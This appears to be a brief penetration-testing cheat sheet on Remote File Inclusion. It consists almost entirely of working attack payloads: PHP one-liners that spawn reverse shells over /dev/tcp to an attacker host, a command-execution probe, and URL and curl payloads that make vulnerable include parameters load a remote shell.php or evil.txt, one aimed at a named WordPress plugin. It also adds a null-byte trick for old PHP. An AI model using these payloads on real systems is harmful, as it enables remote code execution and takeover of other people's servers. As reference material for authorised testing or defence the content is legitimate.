RFI

<?php echo shell_exec("bash -i >& /dev/tcp/ip/1234 0>&1"); ?>

 <?php echo system("0<&196;exec 196<>/dev/tcp/ip/443; sh <&196 >&196 2>&196"); ?>
 <?php echo shell_exec("whoami");?>
 
 
curl http://ip/action=/inc/config.php?basePath=http://ip/test.txt%00

ip/connect.php?file=http://192.168.1.103:8000/shell.php

http://192.168.0.27/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.0.27:8000/shell.php


<?php echo shell_exec("whoami");?>

# Or just get a reverse shell directly like this:
<?php echo system("0<&196;exec 196<>/dev/tcp/ip/443; sh <&196 >&196 2>&196"); ?>

Remember to add the nullbyte %00 to avoid appending .php. This will only work on php before version 5.3.


http://exampe.com/index.php?page=http://attackerserver.com/evil.txt

Last updated